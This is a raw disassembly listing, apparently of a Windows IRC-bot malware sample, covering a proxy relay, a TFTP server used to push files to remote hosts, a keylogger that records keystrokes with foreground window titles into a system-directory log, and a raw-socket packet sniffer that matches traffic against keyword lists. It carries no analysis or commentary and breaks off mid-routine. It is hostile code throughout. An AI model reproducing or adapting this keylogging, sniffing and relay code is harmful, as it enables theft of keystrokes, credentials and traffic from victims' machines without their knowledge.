var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
push 1
mov [ebp+arg_0], esi
imul esi, 234h
pop edi
lea esi, dword_43E59C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call ds:dword_4CB63C ; select
test eax, eax
jnz short loc_411454
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_411454: ; CODE XREF: sub_4113D3+67�j
push ebx
lea eax, [ebp+var_4D0]
push 408h
push eax
push dword ptr [esi]
call ds:dword_4CB66C ; recv
test eax, eax
jg short loc_411485
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_411485: ; CODE XREF: sub_4113D3+98�j
cmp [ebp+var_4D0], 4
jnz loc_41167F
cmp [ebp+var_4CF], 1
jnz loc_41167F
cmp [ebp+var_44], bl
jz short loc_41151B
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_41151B
lea eax, [ebp+var_44]
push eax
lea eax, [ebp+var_4C8]
push eax
push offset dword_434D20
call sub_415221
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Dh
call sub_41B590
add esp, 18h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_41151B: ; CODE XREF: sub_4113D3+CF�j
; sub_4113D3+E5�j
push 10h
lea eax, [ebp+var_18]
push ebx
push eax
call sub_41B590
mov ax, [ebp+var_4CE]
add esp, 0Ch
mov [ebp+var_16], ax
mov eax, [ebp+var_4CC]
push 6
push edi
push 2
mov [ebp+var_18], 2
mov [ebp+var_14], eax
call ds:dword_4CB6D4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4115B3
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset dword_434CE0
call sub_415221
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41B590
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_4115B3: ; CODE XREF: sub_4113D3+181�j
lea eax, [ebp+var_18]
push 10h
push eax
push edi
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_411622
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset dword_434C9C
call sub_415221
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Bh
call sub_41B590
add esp, 14h
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_411622: ; CODE XREF: sub_4113D3+1F0�j
push 400h
lea eax, [ebp+var_4C8]
push ebx
push eax
mov [ebp+var_4D0], bl
mov [ebp+var_4CF], 5Ah
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_4D0]
push ebx
push 8
push eax
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
push dword ptr [esi]
push edi
call sub_411697
pop ecx
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_41167F: ; CODE XREF: sub_4113D3+B9�j
; sub_4113D3+C6�j
push dword ptr [esi]
call ds:dword_4CB6EC ; closesocket
push [ebp+arg_0]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
sub_4113D3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411697 proc near ; CODE XREF: sub_4113D3+286�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
mov esi, 400h
loc_4116AD: ; CODE XREF: sub_411697+C5�j
; sub_411697+F5�j
mov [ebp+var_100], ebx
mov [ebp+var_104], 1
xor ecx, ecx
lea eax, [ebp+var_100]
loc_4116C5: ; CODE XREF: sub_411697+3C�j
mov edx, [ebp+arg_0]
cmp [eax], edx
jz short loc_4116D5
inc ecx
add eax, 4
cmp ecx, 1
jb short loc_4116C5
loc_4116D5: ; CODE XREF: sub_411697+33�j
cmp ecx, 1
jnz short loc_4116EA
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_4116EA: ; CODE XREF: sub_411697+41�j
push esi
lea eax, [ebp+var_504]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_104]
push edi
push edi
push edi
push eax
push edi
call ds:dword_4CB63C ; select
lea eax, [ebp+var_104]
push eax
push ebx
call ds:dword_4CB540 ; __WSAFDIsSet
test eax, eax
jz short loc_41174A
push edi
lea eax, [ebp+var_504]
push esi
push eax
push ebx
call ds:dword_4CB66C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_411792
push edi
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jz short loc_411792
loc_41174A: ; CODE XREF: sub_411697+85�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call ds:dword_4CB540 ; __WSAFDIsSet
test eax, eax
jz loc_4116AD
push edi
lea eax, [ebp+var_504]
push esi
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_411792
push edi
push eax
lea eax, [ebp+var_504]
push eax
push ebx
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jnz loc_4116AD
loc_411792: ; CODE XREF: sub_411697+9A�j
; sub_411697+B1�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_411697 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411797 proc near ; CODE XREF: sub_411797:loc_411C08�p
; DATA XREF: sub_401ACD+210E�o ...
var_87C = dword ptr -87Ch
var_878 = dword ptr -878h
var_778 = byte ptr -778h
var_578 = byte ptr -578h
var_577 = byte ptr -577h
var_576 = byte ptr -576h
var_575 = byte ptr -575h
var_574 = byte ptr -574h
var_374 = dword ptr -374h
var_370 = byte ptr -370h
var_26C = byte ptr -26Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = byte ptr -15Ch
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D0 = byte ptr -0D0h
var_CF = byte ptr -0CFh
var_CE = byte ptr -0CEh
var_CD = byte ptr -0CDh
var_50 = byte ptr -50h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 87Ch
mov edx, [ebp+arg_0]
push ebx
push esi
push edi
push 1
xor ebx, ebx
pop eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_374]
push ebx
push 2
rep movsd
inc [ebp+var_164]
push 2
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_8], eax
mov [edx+2A0h], eax
call ds:dword_4CB6D4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_411837
push 190h
call dword_427078 ; Sleep
cmp [ebp+var_D8], ebx
jnz short loc_411817
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409A73
add esp, 14h
loc_411817: ; CODE XREF: sub_411797+5B�j
lea eax, [ebp+var_778]
push eax
call sub_4151AD
push [ebp+var_168]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_411837: ; CODE XREF: sub_411797+48�j
lea eax, [ebp+var_10]
push 4
push eax
mov edi, 0FFFFh
push 4
push edi
push esi
call ds:dword_4CB634 ; setsockopt
lea eax, [ebp+var_14]
push 4
push eax
push 0FFFFFFFBh
push edi
push esi
call ds:dword_4CB634 ; setsockopt
mov eax, [ebp+var_168]
push 10h
imul eax, 234h
push ebx
mov dword_43E59C[eax], esi
lea eax, [ebp+var_2C]
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_2C], 2
push [ebp+var_160]
call ds:dword_4CB654 ; htons
mov [ebp+var_2A], ax
lea eax, [ebp+var_2C]
push 10h
push eax
push esi
mov [ebp+var_28], ebx
call ds:dword_4CB680 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4118C1
push 1388h
call dword_427078 ; Sleep
dec [ebp+var_164]
push [ebp+arg_0]
jmp loc_411C08
; ---------------------------------------------------------------------------
loc_4118C1: ; CODE XREF: sub_411797+10F�j
lea eax, [ebp+var_370]
push offset dword_429068
push eax
call sub_41B4C2
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_411927
push 190h
call dword_427078 ; Sleep
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409A73
lea eax, [ebp+var_778]
push eax
call sub_4151AD
push [ebp+var_168]
call sub_40B413
add esp, 1Ch
push ebx
call dword_4270CC ; ExitThread
loc_411927: ; CODE XREF: sub_411797+142�j
; sub_411797+42B�j
mov edi, [ebp+arg_0]
cmp [edi+2A0h], ebx
jz loc_411BCB
mov edi, 80h
lea eax, [ebp+var_D0]
push edi
push ebx
push eax
mov [ebp+var_1C], 5
mov [ebp+var_18], 1388h
mov [ebp+var_878], esi
mov [ebp+var_87C], 1
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_87C]
push ebx
push eax
push ebx
call ds:dword_4CB63C ; select
test eax, eax
jle loc_411BBF
mov al, byte_43D808
mov ecx, edi
mov [ebp+var_578], al
xor eax, eax
lea edi, [ebp+var_577]
mov [ebp+var_C], 10h
rep stosd
stosw
stosb
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_3C]
push eax
push ebx
lea eax, [ebp+var_D0]
push 80h
push eax
push esi
call ds:dword_4CB62C ; recvfrom
push [ebp+var_38]
mov [ebp+var_8], eax
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_50]
push eax
call sub_41B886
cmp [ebp+var_D0], bl
pop ecx
pop ecx
jnz loc_411BA9
cmp [ebp+var_CF], 1
jnz loc_411AAF
lea eax, [ebp+var_26C]
push eax
call sub_41AFE0
push ebx
push ebx
push [ebp+var_4]
call sub_41D1EC
push [ebp+var_4]
lea eax, [ebp+var_574]
mov [ebp+var_578], bl
mov [ebp+var_577], 3
push 200h
push 1
push eax
mov [ebp+var_576], bl
mov [ebp+var_575], 1
call sub_41B11A
add esp, 20h
lea ecx, [ebp+var_3C]
mov [ebp+var_8], eax
add eax, 4
push [ebp+var_C]
push ecx
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call ds:dword_4CB6B8 ; sendto
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferSt ; "Tftp transfer started to: %s"
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_411A9D
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409A73
add esp, 14h
loc_411A9D: ; CODE XREF: sub_411797+2E1�j
lea eax, [ebp+var_778]
push eax
call sub_4151AD
pop ecx
jmp loc_411BBF
; ---------------------------------------------------------------------------
loc_411AAF: ; CODE XREF: sub_411797+257�j
cmp [ebp+var_CF], 4
jnz loc_411BA9
mov cl, [ebp+var_CD]
mov al, [ebp+var_CE]
cmp cl, 0FFh
mov [ebp+var_578], bl
mov [ebp+var_577], 3
jnz short loc_411AEC
inc al
xor cl, cl
mov [ebp+var_576], al
mov [ebp+var_575], bl
jmp short loc_411AFA
; ---------------------------------------------------------------------------
loc_411AEC: ; CODE XREF: sub_411797+341�j
inc cl
mov [ebp+var_576], al
mov [ebp+var_575], cl
loc_411AFA: ; CODE XREF: sub_411797+353�j
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
mov edi, 200h
shl eax, 9
sub eax, edi
push ebx
push eax
push [ebp+var_4]
call sub_41D1EC
push [ebp+var_4]
lea eax, [ebp+var_574]
push edi
push 1
push eax
call sub_41B11A
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_3C]
mov [ebp+var_8], edi
push [ebp+var_C]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_578]
push eax
push esi
call ds:dword_4CB6B8 ; sendto
cmp edi, ebx
jnz short loc_411BBF
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_778]
push offset aTftpTransferCo ; "Tftp transfer complete to: %s"
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_D8], ebx
jnz short loc_411B94
push ebx
lea eax, [ebp+var_778]
push [ebp+var_DC]
push eax
lea eax, [ebp+var_15C]
push eax
push [ebp+var_374]
call sub_409A73
add esp, 14h
loc_411B94: ; CODE XREF: sub_411797+3D8�j
lea eax, [ebp+var_778]
push eax
call sub_4151AD
inc ds:dword_4CE15C
pop ecx
jmp short loc_411BBF
; ---------------------------------------------------------------------------
loc_411BA9: ; CODE XREF: sub_411797+24A�j
; sub_411797+31F�j
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
push ebx
push 9
push offset dword_434D60
push esi
call ds:dword_4CB6B8 ; sendto
loc_411BBF: ; CODE XREF: sub_411797+1E9�j
; sub_411797+313�j ...
cmp [ebp+var_8], ebx
jg loc_411927
mov edi, [ebp+arg_0]
loc_411BCB: ; CODE XREF: sub_411797+199�j
push esi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_4]
call sub_41B05B
dec [ebp+var_164]
cmp [edi+2A0h], ebx
pop ecx
jnz short loc_411BFC
push [ebp+var_168]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_411BFC: ; CODE XREF: sub_411797+450�j
push 3E8h
call dword_427078 ; Sleep
push edi
loc_411C08: ; CODE XREF: sub_411797+125�j
call sub_411797
pop edi
pop esi
pop ebx
leave
retn 4
sub_411797 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411C14 proc near ; CODE XREF: sub_411CF5+B4�p
; sub_411CF5+253�p
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = byte ptr 14h
arg_8C = dword ptr 94h
arg_90 = dword ptr 98h
push ebp
mov ebp, esp
sub esp, 314h
lea eax, [ebp+var_10]
push esi
push eax
call dword_42712C ; GetLocalTime
lea eax, [ebp+var_114]
push 104h
push eax
call dword_427074 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push offset asc_43554C ; "\\"
push eax
call sub_41BEC0
lea eax, [ebp+var_114]
push offset dword_429120
push eax
call sub_41BEC0
lea eax, [ebp+var_114]
push offset aAb ; "ab"
push eax
call sub_41B4C2
mov esi, eax
add esp, 18h
test esi, esi
jnz short loc_411C7B
push 1
pop eax
jmp short loc_411CF2
; ---------------------------------------------------------------------------
loc_411C7B: ; CODE XREF: sub_411C14+60�j
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset aDDDDDDS ; "[%d-%d-%d %d:%d:%d] %s\r\n"
push esi
call sub_41BE06
push esi
call sub_41B05B
add esp, 28h
cmp [ebp+arg_90], 0
jnz short loc_411CF0
push [ebp+arg_0]
lea eax, [ebp+var_314]
push offset dword_43551C
push 200h
push eax
call sub_41B980
push 0
lea eax, [ebp+var_314]
push [ebp+arg_8C]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
call sub_409A73
add esp, 24h
loc_411CF0: ; CODE XREF: sub_411C14+A3�j
xor eax, eax
loc_411CF2: ; CODE XREF: sub_411C14+65�j
pop esi
leave
retn
sub_411C14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CF5 proc near ; DATA XREF: sub_401ACD+4509�o
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_4DC = byte ptr -4DCh
var_2DD = byte ptr -2DDh
var_2DC = byte ptr -2DCh
var_DC = byte ptr -0DCh
var_D8 = dword ptr -0D8h
var_48 = byte ptr -48h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8DCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
and [ebp+var_8DC], 0
push 25h
and [ebp+var_4], 0
pop ecx
mov esi, eax
lea edi, [ebp+var_DC]
rep movsd
mov dword ptr [eax+90h], 1
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_8D8]
rep stosd
call ds:dword_4CB5D8 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_4CB5F0 ; GetWindowTextA
mov ebx, 200h
loc_411D50: ; CODE XREF: sub_411CF5+2C7�j
push 8
call dword_427078 ; Sleep
call ds:dword_4CB5D8 ; GetForegroundWindow
cmp eax, [ebp+var_8]
jz short loc_411DD8
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
mov [ebp+var_8], eax
call ds:dword_4CB5F0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
lea eax, [ebp+var_4DC]
push offset aSChangedWindow ; "%s (Changed Windows: %s)"
push eax
call sub_41B886
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_411C14
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_41B590
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_41B590
add esp, 0Ch
loc_411DD8: ; CODE XREF: sub_411CF5+6C�j
mov [ebp+arg_0], offset aB ; "b"
loc_411DDF: ; CODE XREF: sub_411CF5+2BD�j
push 10h
call ds:dword_4CB528 ; GetKeyState
movsx esi, ax
mov eax, [ebp+arg_0]
mov edi, [eax-4]
push edi
call ds:dword_4CB620 ; GetAsyncKeyState
test ah, 80h
jz short loc_411E77
push 14h
call ds:dword_4CB528 ; GetKeyState
test ax, ax
jz short loc_411E28
cmp esi, 0FFFFFFFFh
jle short loc_411E28
cmp edi, 40h
jle short loc_411E28
cmp edi, 5Bh
jge short loc_411E28
mov [ebp+edi*4+var_8DC], 1
jmp loc_411FA7
; ---------------------------------------------------------------------------
loc_411E28: ; CODE XREF: sub_411CF5+112�j
; sub_411CF5+117�j ...
push 14h
call ds:dword_4CB528 ; GetKeyState
test ax, ax
jz short loc_411E53
test esi, esi
jge short loc_411E67
cmp edi, 40h
jle short loc_411E53
cmp edi, 5Bh
jge short loc_411E53
mov [ebp+edi*4+var_8DC], 2
jmp loc_411FA7
; ---------------------------------------------------------------------------
loc_411E53: ; CODE XREF: sub_411CF5+13E�j
; sub_411CF5+147�j ...
test esi, esi
jge short loc_411E67
mov [ebp+edi*4+var_8DC], 3
jmp loc_411FA7
; ---------------------------------------------------------------------------
loc_411E67: ; CODE XREF: sub_411CF5+142�j
; sub_411CF5+160�j
mov [ebp+edi*4+var_8DC], 4
jmp loc_411FA7
; ---------------------------------------------------------------------------
loc_411E77: ; CODE XREF: sub_411CF5+105�j
mov esi, [ebp+edi*4+var_8DC]
lea eax, [ebp+edi*4+var_8DC]
test esi, esi
jz loc_411FA7
and dword ptr [eax], 0
lea eax, [ebp+var_2DC]
cmp edi, 8
push eax
jnz short loc_411EAF
call sub_41AFE0
and [ebp+eax+var_2DD], 0
pop ecx
jmp loc_411FA7
; ---------------------------------------------------------------------------
loc_411EAF: ; CODE XREF: sub_411CF5+1A5�j
call sub_41AFE0
cmp eax, 1B9h
pop ecx
jbe short loc_411EE1
call ds:dword_4CB5D8 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_4CB5F0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSBufferFullS ; "%s (Buffer full) (%s)"
jmp short loc_411F22
; ---------------------------------------------------------------------------
loc_411EE1: ; CODE XREF: sub_411CF5+1C5�j
cmp edi, 0Dh
jnz loc_411F79
lea eax, [ebp+var_2DC]
push eax
call sub_41AFE0
test eax, eax
pop ecx
jz loc_411FA7
call ds:dword_4CB5D8 ; GetForegroundWindow
lea ecx, [ebp+var_48]
push 3Ch
push ecx
push eax
call ds:dword_4CB5F0 ; GetWindowTextA
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2DC]
push eax
push offset aSReturnS ; "%s (Return) (%s)"
loc_411F22: ; CODE XREF: sub_411CF5+1EA�j
lea eax, [ebp+var_4DC]
push eax
call sub_41B886
sub esp, 84h
lea esi, [ebp+var_DC]
lea eax, [ebp+var_4DC]
push 25h
pop ecx
mov edi, esp
push eax
rep movsd
call sub_411C14
mov [ebp+var_4], eax
push ebx
lea eax, [ebp+var_2DC]
push 0
push eax
call sub_41B590
add esp, 0A4h
lea eax, [ebp+var_4DC]
push ebx
push 0
push eax
call sub_41B590
add esp, 0Ch
jmp short loc_411FA7
; ---------------------------------------------------------------------------
loc_411F79: ; CODE XREF: sub_411CF5+1EF�j
cmp esi, 1
jz short loc_411F92
cmp esi, 3
jz short loc_411F92
cmp esi, 2
jz short loc_411F8D
cmp esi, 4
jnz short loc_411FA7
loc_411F8D: ; CODE XREF: sub_411CF5+291�j
push [ebp+arg_0]
jmp short loc_411F99
; ---------------------------------------------------------------------------
loc_411F92: ; CODE XREF: sub_411CF5+287�j
; sub_411CF5+28C�j
mov eax, [ebp+arg_0]
add eax, 7
push eax
loc_411F99: ; CODE XREF: sub_411CF5+29B�j
lea eax, [ebp+var_2DC]
push eax
call sub_41BEC0
pop ecx
pop ecx
loc_411FA7: ; CODE XREF: sub_411CF5+12E�j
; sub_411CF5+159�j ...
add [ebp+arg_0], 14h
cmp [ebp+arg_0], offset dword_4354E4
jl loc_411DDF
cmp [ebp+var_4], 0
jz loc_411D50
push [ebp+var_D8]
call sub_40B413
pop ecx
push 0
call dword_4270CC ; ExitThread
sub_411CF5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411FD6 proc near ; DATA XREF: sub_401ACD+412B�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_41BB20
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call ds:dword_4CB654 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AC10
pop ecx
push eax
call ds:dword_4CB694 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call ds:dword_4CB6D4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_4120AB
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_435EEC
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_41208E
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409A73
add esp, 14h
loc_41208E: ; CODE XREF: sub_411FD6+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_4151AD
push [ebp+var_30]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_4120AB: ; CODE XREF: sub_411FD6+76�j
mov eax, [ebp+var_30]
push 10h
imul eax, 234h
mov dword_43E59C[eax], edi
lea eax, [ebp+var_1C]
push eax
push edi
call ds:dword_4CB680 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_412130
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_435EC0
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_41210C
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409A73
add esp, 14h
loc_41210C: ; CODE XREF: sub_411FD6+114�j
lea eax, [ebp+var_2B4]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_30]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_412130: ; CODE XREF: sub_411FD6+F4�j
push esi
lea eax, [ebp+var_20]
push esi
push eax
push esi
push esi
lea eax, [ebp+var_8]
push 4
push eax
push 98000001h
push edi
call ds:dword_4CB600 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4121B3
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset dword_435E90
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_41218F
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409A73
add esp, 14h
loc_41218F: ; CODE XREF: sub_411FD6+197�j
lea eax, [ebp+var_2B4]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_30]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_4121B3: ; CODE XREF: sub_411FD6+177�j
push ebx
mov ebx, offset dword_4355A8
loc_4121B9: ; CODE XREF: sub_411FD6+21B�j
; sub_411FD6+22D�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_102B4]
push edi
push esi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_102B4]
push esi
push edi
push eax
push [ebp+var_4]
call ds:dword_4CB66C ; recv
cmp eax, 0FFFFFFFFh
jz loc_4122E6
cmp [ebp+var_102AB], 6
jnz short loc_4121B9
mov eax, [ebp+var_102A8]
cmp [ebp+var_10293], 18h
mov [ebp+var_C], eax
jnz short loc_4121B9
lea eax, [ebp+var_1028C]
push offset dword_435E84
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4121B9
lea eax, [ebp+var_1028C]
push offset dword_435E74
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4121B9
mov eax, ebx
xor edi, edi
test eax, eax
jz loc_4121B9
mov [ebp+arg_0], ebx
loc_412242: ; CODE XREF: sub_411FD6+287�j
push eax
lea eax, [ebp+var_1028C]
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412264
inc edi
add [ebp+arg_0], 18h
mov eax, [ebp+arg_0]
jnz short loc_412242
jmp loc_4121B9
; ---------------------------------------------------------------------------
loc_412264: ; CODE XREF: sub_411FD6+27D�j
lea eax, [ebp+var_1028C]
push eax
